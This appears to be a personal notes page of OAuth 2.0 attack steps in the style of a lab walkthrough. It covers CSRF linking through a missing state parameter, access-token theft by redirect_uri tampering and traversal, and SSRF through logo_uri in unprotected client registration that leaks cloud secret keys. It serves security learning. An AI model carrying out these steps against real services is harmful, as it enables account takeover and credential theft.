oAuth
General
OAuth 2.0 was originally developed as a way of sharing access to specific data between applications. It works by defining a series of interactions between three distinct parties, namely a client application, a resource owner, and the OAuth service provider.
Client application - The website or web application that wants to access the user's data.
Resource owner - The user whose data the client application wants to access.
OAuth service provider - The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.
Once you know the hostname of the authorization server, you should always try sending a GET
request to the following standard endpoints:
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
Stole linking code and access other user
if you notice that the authorization request does not send a state
parameter, this is extremely interesting from an attacker's perspective. It potentially means that they can initiate an OAuth flow themselves before tricking a user's browser into completing it
Generate profile linking with your account
Get linking code
Drop request
Send iFrame to victim
Login with your social account
PRIV ESCALATION COMPLETE
Redirect URI
Change the redirect_uri
to point to the exploit server, then send the request and follow the redirect.
Redirect URI with protection (directory traversal)
Victim access token will appear in the access log
In Repeater, go to the GET /me
request and replace the token in the Authorization: Bearer
header with the one you just copied
Unprotected dynamic client registration
Register new client
Get new client ID
In Repeater, go to the
GET /client/CLIENT-ID/logo
request. Replace theCLIENT-ID
in the path with the new one you just copied and send the request.Go to the Collaborator tab dialog and check for any new interactions. Notice that there is an HTTP interaction attempting to fetch your non-existent logo. This confirms that you can successfully use the
logo_uri
property to elicit requests from the OAuth server.Add logo URI to the not accesable url of webapp credential
Go back to the
GET /client/CLIENT-ID/logo
request and replace theclient_id
with the new one you just copied. Send this request. Observe that the response contains the sensitive metadata for the OAuth provider's cloud environment, including the secret access key.
Last updated